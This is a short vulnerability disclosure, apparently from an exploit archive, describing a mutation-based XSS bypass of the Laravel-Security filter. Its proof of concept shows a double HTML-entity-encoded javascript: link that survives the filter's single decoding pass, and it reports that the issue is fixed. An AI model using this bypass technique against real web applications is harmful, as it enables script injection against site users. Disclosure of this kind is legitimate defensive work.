#; Lavarel-Security XSS Filter Bypass Vulnerability

1. Full title Lavarel-Security XSS Filter Bypass Vulnerability
2. Date add 2014-05-01
3. Category web applications
4. Platform php
5. Risk <font color="#A5DF00">Security Risk Low</font>
6. ===================================
7.  
8. *#Product: Lavarel-Security XSS Filter Bypass*
9. *#Vulnerability: Mutation Based XSS Bypass *
10. *#Impact: Medium/High*
11. *#Authors: Rafay Baloch *
12. *#Company: RHAinfoSEC *
13. *#Website: http://rhainfosec.com
14. *#Status: Fixed*
15.  
16. *=========*
17. *Description*
18. *=========*
19.  
20. Laravel Security is a port of the security class from Codeigniter 2.1 for
21. Laravel 4.1. It relies upon a blacklist approach to filter out common
22. malicious inputs.
23.  
24. *=========*
25. *Vulnerability*
26. *==========*
27.  
28. The vulnerability lies in the fact that the XSS filter was decoding HTML
29. entities, therefore based upon this fact it was
30. possible to construct a payload that would successfully bypass the
31. filtering mechanisms and execute javascript.
32.  
33. *=============*
34. *Proof of concept*
35. *=============*
36.  
37. During intial test the following input was provided:
38.  
39. <a
40. href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
41.  
42. The filter decodes the HTML entities and hence the attack was being
43. blocked.
44.  
45. After Decoding:
46.  
47. <a href="javascript:alert(1)">Clickhere</a>
48.  
49. Next, we double encoded the entities:
50.  
51. <a
52. href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>
53.  
54. And since the filter would decode the entities once, we are left with the
55. following:
56.  
57.  
58. <a
59. href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
60.  
61. Which is perfectly a valid syntax inside of href context and would execute
62. javascript.
63.  
64. *===*
65. *Fix*
66. *===*
67.  
68. The vulnerability has been fixed, the latest version doesn't decode HTML
69. entites and hence the attack is mitigated.
70.  
71.  
72. *==========*
73. *References*
74. *==========*
75.  
76. https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413